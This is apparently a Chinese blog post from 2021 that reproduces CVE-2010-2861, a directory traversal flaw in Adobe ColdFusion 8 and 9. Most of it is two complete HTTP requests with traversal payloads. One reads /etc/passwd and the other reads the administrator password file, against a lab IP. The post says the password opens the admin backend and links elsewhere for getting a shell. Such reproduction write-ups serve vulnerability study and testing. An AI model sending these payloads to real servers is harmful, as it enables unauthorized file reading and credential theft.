CVE-2010-2861

Adobe ColdFusion CVE-2010-2861 任意文件读取漏洞复现

0. 漏洞介绍

Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。

1. 漏洞影响

Adobe ColdFusion 8
Adobe ColdFusion 9

2. 漏洞复现

  1. 尝试读取/etc/passwd:
GET /CFIDE/administrator/enter.cfm?locale=enter.cfm?locale=../../../../../../../../../etc/passwd%00en HTTP/1.1
Host: 192.168.163.128:8500
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1
Sec-GPC: 1
Cache-Control: max-age=0

  1. 尝试读取后台密码:
GET /CFIDE/administrator/enter.cfm?locale=enter.cfm?locale=../../../../../../../lib/password.properties%00en HTTP/1.1
Host: 192.168.163.128:8500
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1
Sec-GPC: 1
Cache-Control: max-age=0


解码:

  1. 进入后台。

总结

Adobe ColdFusion漏洞较多,该目录穿越漏洞除了获取敏感信息外,更多的是用来获取后台密码,进入后台,毕竟这个ColdFusion是一个动态的动态Web服务器;如果想要利用该漏洞获取shell,可以看看这篇博客https://www.vuln.cn/6118,ColdFusion漏洞比较多,这里就不复现反弹shell了,以后有时间在做。

posted @ 2021-11-03 17:23  七先生  阅读(249)  评论(0编辑  收藏  举报